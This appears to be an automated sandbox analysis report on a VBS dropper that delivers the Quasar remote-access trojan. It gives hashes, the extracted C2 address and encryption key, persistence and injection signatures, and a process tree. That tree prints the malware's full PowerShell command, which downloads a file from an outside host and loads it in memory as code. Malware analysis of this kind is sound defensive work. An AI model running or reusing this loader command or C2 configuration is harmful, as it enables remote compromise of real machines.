Analysis
-
max time kernel
299s -
max time network
302s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
17-10-2021 07:15
Static task
static1
General
-
Target
5c395df95b067f10c115f92e193d7f61bc6ce05eefb20bfc86aac86f278e0600.vbs
-
Size
1KB
-
MD5
010eb448243fbab8334a1c528ec2e356
-
SHA1
35c7cb4272dd30c97711284673b60e9bf8aa105e
-
SHA256
5c395df95b067f10c115f92e193d7f61bc6ce05eefb20bfc86aac86f278e0600
-
SHA512
846869584bd44dfe8cbc96bb4e6a32e3a317a027646e4715253c226147941c1f934d0927e6a92262717a07cb77aa76e5c20721c72702cc4ded98523c954ce127
Malware Config
Extracted
quasar
1.3.0.0
8
3.36.121.136:4782
QSR_MUTEX_2buErdxrYVW8JvhTM4
-
encryption_key
HHPAsaGEK7mx9XJmMzI4
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
10
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/3584-140-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar behavioral1/memory/3584-141-0x000000000045819E-mapping.dmp family_quasar -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 3172 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 2 IoCs
Processes:
WScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LLA.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LLA.vbs WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3172 set thread context of 3584 3172 powershell.exe CasPol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepid process 3172 powershell.exe 3172 powershell.exe 3172 powershell.exe 3172 powershell.exe 3172 powershell.exe 3172 powershell.exe 3172 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeCasPol.exedescription pid process Token: SeDebugPrivilege 3172 powershell.exe Token: SeDebugPrivilege 3584 CasPol.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
CasPol.exepid process 3584 CasPol.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1688 wrote to memory of 3172 1688 WScript.exe powershell.exe PID 1688 wrote to memory of 3172 1688 WScript.exe powershell.exe PID 3172 wrote to memory of 768 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 768 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 768 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 2836 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 2836 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 2836 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 3584 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 3584 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 3584 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 3584 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 3584 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 3584 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 3584 3172 powershell.exe CasPol.exe PID 3172 wrote to memory of 3584 3172 powershell.exe CasPol.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5c395df95b067f10c115f92e193d7f61bc6ce05eefb20bfc86aac86f278e0600.vbs"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr -OutFile 'C:\Users\Public\Documents\VDO.html' -Uri 'https://sxom.000webhostapp.com/VDO.html' ;$b = [System.IO.File]::ReadAllBytes('C:\Users\Public\Documents\VDO.html');[System.Reflection.Assembly]::Load($b);[VDO.UIK]::Exe();2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3172-132-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-124-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-117-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-118-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-119-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-120-0x00000247900A0000-0x00000247900A1000-memory.dmpFilesize
4KB
-
memory/3172-121-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-122-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-123-0x00000247A8700000-0x00000247A8701000-memory.dmpFilesize
4KB
-
memory/3172-142-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-128-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-129-0x00000247A85F0000-0x00000247A85F2000-memory.dmpFilesize
8KB
-
memory/3172-130-0x00000247A85F3000-0x00000247A85F5000-memory.dmpFilesize
8KB
-
memory/3172-116-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-131-0x00000247A85F6000-0x00000247A85F8000-memory.dmpFilesize
8KB
-
memory/3172-134-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-135-0x00000247A8550000-0x00000247A85AA000-memory.dmpFilesize
360KB
-
memory/3172-136-0x000002478FD90000-0x000002478FD92000-memory.dmpFilesize
8KB
-
memory/3172-115-0x0000000000000000-mapping.dmp
-
memory/3584-149-0x00000000065F0000-0x00000000065F1000-memory.dmpFilesize
4KB
-
memory/3584-141-0x000000000045819E-mapping.dmp
-
memory/3584-145-0x0000000005CF0000-0x0000000005CF1000-memory.dmpFilesize
4KB
-
memory/3584-146-0x0000000005890000-0x0000000005891000-memory.dmpFilesize
4KB
-
memory/3584-147-0x00000000057F0000-0x0000000005CEE000-memory.dmpFilesize
5.0MB
-
memory/3584-148-0x0000000005A50000-0x0000000005A51000-memory.dmpFilesize
4KB
-
memory/3584-140-0x0000000000400000-0x000000000045E000-memory.dmpFilesize
376KB
-
memory/3584-150-0x00000000068D0000-0x00000000068D1000-memory.dmpFilesize
4KB
-
memory/3584-151-0x0000000006C40000-0x0000000006C41000-memory.dmpFilesize
4KB